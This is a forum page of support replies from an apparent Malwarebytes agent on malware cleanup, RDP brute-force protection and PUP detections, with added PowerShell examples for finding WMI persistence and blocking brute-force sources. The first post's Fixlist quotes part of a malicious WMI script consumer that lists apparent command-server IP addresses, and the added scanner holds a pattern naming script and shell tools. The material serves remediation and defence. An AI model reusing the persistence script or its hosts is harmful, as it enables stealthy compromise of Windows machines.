kaizen

Members
  • Posts: 17

Posts posted by kaizen

  1. Hello mlonabaugh,

    No problem.  Copy the quoted text below into Notepad and save it as Fixlist.txt.

     

    HKLM\...\Command Processor: C:\ProgramData\SQLAGENTVHC.exe <==== ATTENTION
    cmd: certutil -hashfile "C:\ProgramData\SQLAGENTVHC.exe" sha256
    C:\ProgramData\SQLAGENTVHC.exe
    GroupPolicy: Restriction ? <==== ATTENTION
    GroupPolicyScripts: Restriction <==== ATTENTION
    Policies: C:\Users\aadmincopy\NTUSER.pol: Restriction <==== ATTENTION
    Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
    Policies: C:\Users\backup_svc\NTUSER.pol: Restriction <==== ATTENTION
    Policies: C:\Users\mlonabaugh\NTUSER.pol: Restriction <==== ATTENTION
    Policies: C:\Users\NTRSupport1\NTUSER.pol: Restriction <==== ATTENTION
    Policies: C:\Users\NTRSupport2\NTUSER.pol: Restriction <==== ATTENTION
    Policies: C:\Users\NTRSupport3\NTUSER.pol: Restriction <==== ATTENTION
    Policies: C:\Users\NTRSupport4\NTUSER.pol: Restriction <==== ATTENTION
    Policies: C:\Users\printing\NTUSER.pol: Restriction <==== ATTENTION
    Policies: C:\Users\SPAdmin\NTUSER.pol: Restriction <==== ATTENTION
    Policies: C:\Users\SPService\NTUSER.pol: Restriction <==== ATTENTION
    Powershell: Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
    Powershell: Get-WMIObject -Namespace root\Subscription -Class ActiveScriptEventConsumer
    WMI:subscription\__FilterToConsumerBinding->\\.\root\subscription:ActiveScriptEventConsumer.Name=\"bleepyoumm_consumer\"",Filter="\\.\root\subscription:__EventFilter.Name=\"bleepyoumm_filter\":: <==== ATTENTION
    WMI:subscription\__TimerInstruction->bleepyoumm_itimer:: <==== ATTENTION
    WMI:subscription\__IntervalTimerInstruction->bleepyoumm_itimer:: <==== ATTENTION
    WMI:subscription\__EventFilter->bleepyoumm_filter::[Query => select * from __timerevent where timerid="bleepyoumm_itimer"] <==== ATTENTION
    WMI:subscription\ActiveScriptEventConsumer->bleepyoumm_consumer::[ScriptText => var toff=3000;var fso=new ActiveXObject("Scripting.FilesystemObject");var http=new ActiveXObject("Msxml2.ServerXMLHTTP");if(!fso.FileExists('wpd.xml')){var f=fso.CreateTextFile('wpd.xml',2);f.writeLine('69.30.200.178'+'\r\n'+'45.116.13.219'+'\r\n'+'150.107.76.227'+'\r\n'+'103.213.246.23');f.Close(); (the data entry has 2402 more characters).] <==== ATTENTION 

    Thanks again,

    • Like 1
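The Fixlist above removes a permanent WMI event subscription (filter, consumer, binding and the timer that drives it) plus a Command Processor autorun. Below is an added PowerShell example for inspecting the same persistence points on a host; it is not kaizen's Fixlist and not FRST or Malwarebytes code. The `root\subscription` classes and the `HKLM\SOFTWARE\Microsoft\Command Processor` AutoRun value are real Windows locations; the `$suspiciousText` patterns and the `-Remove` behaviour are the example's own assumptions.

```powershell
# Added example: enumerate permanent WMI event subscriptions in root\subscription
# (the persistence the Fixlist above removes) and flag ones whose consumer payload
# looks scripted. Not FRST or Malwarebytes code. Run elevated; nothing is deleted
# unless -Remove is given.
[CmdletBinding()]
param([switch]$Remove)

$ns = 'root\subscription'

# Assumption: strings that warrant a look in a consumer's script/command text.
# A real deployment would pair this with an allowlist of known-good consumers.
$suspiciousText = 'ActiveXObject|ServerXMLHTTP|WScript\.Shell|powershell|cmd\.exe|certutil'

# Querying the abstract base classes returns every derived instance
# (ActiveScriptEventConsumer, CommandLineEventConsumer, __IntervalTimerInstruction, ...).
$filters   = @(Get-CimInstance -Namespace $ns -ClassName __EventFilter -ErrorAction SilentlyContinue)
$consumers = @(Get-CimInstance -Namespace $ns -ClassName __EventConsumer -ErrorAction SilentlyContinue)
$bindings  = @(Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding -ErrorAction SilentlyContinue)
$timers    = @(Get-CimInstance -Namespace $ns -ClassName __TimerInstruction -ErrorAction SilentlyContinue)

function Get-NameFromPath([string]$ObjectPath) {
    # Binding references look like \\.\root\subscription:__EventFilter.Name="bleepyoumm_filter"
    if ($ObjectPath -match 'Name="([^"]+)"') { return $Matches[1] }
    return $ObjectPath
}

$findings = foreach ($b in $bindings) {
    $filterName   = Get-NameFromPath $b.Filter
    $consumerName = Get-NameFromPath $b.Consumer
    $filter   = $filters   | Where-Object Name -eq $filterName   | Select-Object -First 1
    $consumer = $consumers | Where-Object Name -eq $consumerName | Select-Object -First 1

    # ActiveScriptEventConsumer carries ScriptText; CommandLineEventConsumer carries CommandLineTemplate.
    $payload = [string]($consumer.ScriptText + $consumer.CommandLineTemplate)

    [pscustomobject]@{
        Filter     = $filterName
        Query      = $filter.Query
        Consumer   = $consumerName
        Class      = $consumer.CimClass.CimClassName
        Suspicious = [bool]($payload -match $suspiciousText)
        Payload    = $payload.Substring(0, [Math]::Min(100, $payload.Length))
    }
}

"Permanent subscriptions:"
$findings | Format-Table -AutoSize | Out-String -Width 200
"Timer instructions (a timer-driven filter fires even when nothing else happens on the box):"
$timers | Select-Object TimerId, IntervalBetweenEvents | Format-Table -AutoSize | Out-String

# The Fixlist also cleared a Command Processor autorun: cmd.exe runs this value on
# every start, which is why it is a common place to re-launch a dropped executable.
foreach ($key in 'HKLM:\SOFTWARE\Microsoft\Command Processor', 'HKCU:\SOFTWARE\Microsoft\Command Processor') {
    $autorun = (Get-ItemProperty -Path $key -Name AutoRun -ErrorAction SilentlyContinue).AutoRun
    if ($autorun) { "Command Processor AutoRun set in ${key}: $autorun" }
}

if ($Remove) {
    foreach ($f in $findings | Where-Object Suspicious) {
        # Binding first, then filter and consumer, then any timer the filter's query references.
        $bindings  | Where-Object { (Get-NameFromPath $_.Filter) -eq $f.Filter } | Remove-CimInstance
        $filters   | Where-Object Name -eq $f.Filter   | Remove-CimInstance
        $consumers | Where-Object Name -eq $f.Consumer | Remove-CimInstance
        $timers    | Where-Object { $f.Query -like "*$($_.TimerId)*" } | Remove-CimInstance
        "Removed subscription $($f.Filter) -> $($f.Consumer)"
    }
}
```

Run it without switches first and review the table; the `Query` column shows the trigger (the post's filter selects `__timerevent` for a specific `timerid`, i.e. it fires on a schedule rather than on a real system event), and `Payload` shows the first characters of the consumer script. Only after confirming a row is unwanted would you re-run with `-Remove`, which deletes the binding before the filter and consumer so no orphaned binding is left behind.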
  2. Hello mlonabaugh,

    Thank you for reaching out to us regarding this issue.  I'm from the Nebula team that handles Malware Remediation.  I was able to review your FRST logs from the BC forum and have made you a Fixlist that should resolve the issue.  Please follow the steps below to use the attached Fixlist.txt:

    1. Download the file Fixlist.txt that is attached to this post and save it to the same folder as FRST64.exe
    2. Open FRST64.exe and click Fix
    3. You should get a pop-up stating the Fix completed and that a Fixlog.txt was generated. Click OK.

    Please attach the Fixlog.txt to your reply, and let me know if you're still seeing the scan results after rebooting the server.

    Thanks again,

    Fixlist.txt

    • Like 1
  3. Hello Mark,

    Thank you for reaching out to us.  At this time, Brute Force Protection for FTP only integrates directly with the FTP software embedded within the Server OS.  This is because the embedded FTP server logs connection attempts and failures within the Security Event Log similar to RDP connection attempts.  Third party FTP software handles logging internally and would require unique integrations to monitor their connection logs.

    If you have any other questions or concerns, please let me know.

    Thanks again,

  4. Hello Chris,

    You're very welcome!  I'm glad to hear your RDP is already behind a VPN and not directly accessible from the internet.

    LAN to LAN failed login attempts do show up as well unless you check the box to 'Prevent private network connections from being blocked'.  

    To learn more about these attempts, as well as if and when a successful connection was made, you'll need to review the Terminal Services Operational Logs in the Windows Event Viewer.
    https://superuser.com/questions/409099/is-there-a-log-file-for-rdp-connections

    Thanks again,

  5. Hello Chris,

    Thank you for reaching out to us for more information regarding the RDP Intrusion Detections.  This alert is created by the Brute Force Protection setting within your Nebula policy.  With Brute Force Protection enabled, the default setting is "monitor mode" which will trigger a Remote Intrusion Detection when your Windows Remote Desktop (RDP) sees 5 failed attempts within 5 minutes from the same IP address.

    You can learn more about Brute Force Protection here:
    https://support.malwarebytes.com/hc/en-us/articles/360056829274-Configure-Brute-Force-Protection-in-Malwarebytes-Nebula

    Monitor mode will give you a general idea of the number of failed login attempts you are seeing, and help you identify if your RDP is under attack from a Brute Force attempt.  Switching to Block Mode will enable the Windows Firewall and block the offending IP for the time you set within the policy.  Before enabling Block Mode, I would suggest first enabling Windows Firewall on your devices to ensure it's compatible with your current configuration and add any Allow rules as needed to the Windows Firewall.  Once you are confident Windows Firewall is working properly, you can enable Block Mode and Malwarebytes will create temporary Windows Firewall rules to block the IPs that are attempting to Brute Force for the time you specified within the policy.

    You can also read more about hardening your RDP security in our article below, such as moving RDP behind a VPN, using a 3rd party remote access service, etc.
    https://blog.malwarebytes.com/security-world/business-security-world/2018/08/protect-rdp-access-ransomware-attacks/

    Thanks again,
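The rule kaizen describes (a detection when 5 failed attempts arrive within 5 minutes from the same IP) and the block-mode behaviour (temporary Windows Firewall rules for the offending address) can be reproduced against a host's own Security log. The following is an added PowerShell example, not Malwarebytes' implementation: it reads event 4625, applies the sliding window per source IP, and with `-Block` adds an expiring firewall rule. The parameter names, the `BFP-Example-Block-` rule prefix, the 60-minute default block duration, and the private-range check (mirroring the 'Prevent private network connections from being blocked' option from the earlier reply) are assumptions of this example.

```powershell
# Added example, not Malwarebytes code: apply the "monitor mode" rule from the
# post (5 failed logons within 5 minutes from one source IP) to the local
# Security log, and optionally do what "block mode" is described as doing:
# add a temporary Windows Firewall rule for the offending IP. Run elevated.
[CmdletBinding()]
param(
    [int]$Threshold     = 5,
    [int]$WindowMinutes = 5,
    [int]$LookbackHours = 24,
    [int]$BlockMinutes  = 60,       # assumption: stands in for the policy's block duration
    [switch]$Block,
    [switch]$IgnorePrivate          # like 'Prevent private network connections from being blocked'
)

$rulePrefix = 'BFP-Example-Block-'  # assumption: naming for the temporary rules created here

function Test-PrivateIp([string]$Ip) {
    # RFC 1918, loopback and link-local IPv4 only (IPv6 is left out of this example).
    return $Ip -match '^(10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.|127\.|169\.254\.)'
}

# 1. Pull failed logons (event 4625) and read the source address out of the event XML.
#    Logon type is kept for reference only: with NLA a failed RDP logon is usually
#    type 3, without it type 10, so filtering on type alone would miss attempts.
$since  = (Get-Date).AddHours(-$LookbackHours)
$events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4625; StartTime = $since } -ErrorAction SilentlyContinue
$attempts = foreach ($e in $events) {
    $data = @{}
    foreach ($d in ([xml]$e.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    if ($data.IpAddress -and $data.IpAddress -ne '-') {
        [pscustomobject]@{ Time = $e.TimeCreated; Ip = $data.IpAddress; User = $data.TargetUserName; LogonType = $data.LogonType }
    }
}

# 2. Sliding window per source IP: report the first run of $Threshold attempts
#    whose first and last fall within $WindowMinutes of each other.
$hits = foreach ($g in ($attempts | Group-Object Ip)) {
    if ($IgnorePrivate -and (Test-PrivateIp $g.Name)) { continue }
    $times = @($g.Group | Sort-Object Time | ForEach-Object Time)
    for ($i = 0; $i + $Threshold - 1 -lt $times.Count; $i++) {
        $span = $times[$i + $Threshold - 1] - $times[$i]
        if ($span.TotalMinutes -le $WindowMinutes) {
            [pscustomobject]@{
                Ip       = $g.Name
                Attempts = $times.Count
                Users    = ($g.Group.User | Sort-Object -Unique) -join ','
                First    = $times[$i]
                Last     = $times[$i + $Threshold - 1]
            }
            break
        }
    }
}

"Sources with $Threshold or more failed logons inside $WindowMinutes minutes (last $LookbackHours h):"
$hits | Format-Table -AutoSize | Out-String

# 3. Optional block mode. As the post advises, make sure the firewall is actually on first.
if ($Block) {
    $off = Get-NetFirewallProfile | Where-Object { $_.Enabled -ne 'True' }
    if ($off) { Write-Warning "Windows Firewall disabled for profile(s): $($off.Name -join ', '); block rules will not take effect." }

    # Expire rules from earlier runs whose block window has passed.
    Get-NetFirewallRule -DisplayName "$rulePrefix*" -ErrorAction SilentlyContinue |
        Where-Object { $_.Description -match '^Expires (.+)$' -and [datetime]$Matches[1] -lt (Get-Date) } |
        Remove-NetFirewallRule

    foreach ($h in $hits) {
        $name = "$rulePrefix$($h.Ip)"
        if (-not (Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue)) {
            New-NetFirewallRule -DisplayName $name -Direction Inbound -Action Block -RemoteAddress $h.Ip `
                -Description "Expires $((Get-Date).AddMinutes($BlockMinutes).ToString('o'))" | Out-Null
            "Blocked $($h.Ip) for $BlockMinutes minutes"
        }
    }
}
```

Running it with no switches is the equivalent of monitor mode: you get the list of source addresses, the accounts they tried, and the window in which the threshold was crossed, which is what you need to decide whether the noise is internet scanning or a misconfigured internal host. The expiry is stored in the rule's Description so a later run (for example from a scheduled task) can clean up without keeping any state of its own.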

     

  6. Thank you for sharing the detection report.  The block was from Chrome attempting to load the Restoro website.  Restoro is detected by Malwarebytes as a PUP (Potentially Unwanted Program).  These are generally programs that are not harmful, but may be unwanted for reasons such as causing pop-ups or advertisements to appear, tracking user data, or making misleading claims.  You can read more about our specific detection for Restoro here:

    https://blog.malwarebytes.com/detections/pup-optional-restoro/

    VirusTotal won't have much for the Restoro.com website itself as the website is related to a PUP, but you can see the results for the Restoro downloader here:

    https://www.virustotal.com/gui/file/5d99408fc2f7bc85f2c4bc6dcd762008bfecd5c8dcaaacf9c9bdc2914ddd22b1/detection

    Thanks again!

  7. Hello jgt1942,

    Thanks for sharing the screenshots and log files.  The detections you are seeing are likely from Browser Push Notification entries within Chrome.  These notification entries can be used to display unwanted advertisements, or even messages to try and trick you into thinking your computer is infected.

    Open your Chrome browser and paste the following address into the address bar, and then press Enter on your keyboard:
    chrome://settings/content/notifications

    This will bring you to the Site Notifications settings page.  Turning off the option at the top for 'Sites can ask to send notifications' will turn off all notifications and should stop the Malwarebytes detections. 

    If you would like to instead fine-tune this setting, inspect the list of allowed sites for any you do not recognize or trust.  Click the three-dots icon next to the unwanted entry and choose Block.

    Thanks again,

    • Like 1
  8. Hello Tony,

    I'd like to get additional details regarding the detection.  Please double-click one of the detection entries in the History page as shown in your screenshot.

    This will bring up a new page with additional details.  Choose Export at the bottom and then Export to TXT.  Save the report as Detection.txt to your desktop.

    Please share the Detection.txt file as an attachment here.

    Thanks again,

  9. MBAM Premium 3.1.2.1733 Update Package 1.0.2231 Component package 1.0.141 on two Windows x64 Creators Update systems.

    Just started happening tonight.

    If MBAM Premium is running when World of Warcraft is launched, you will get randomly disconnected anywhere between 10s and 2min of gameplay with WoW error WOW51900319.

    Quit MBAM, game runs just fine.

    If you open MBAM while World of Warcraft has been running great for 20 minutes, you get disconnected.
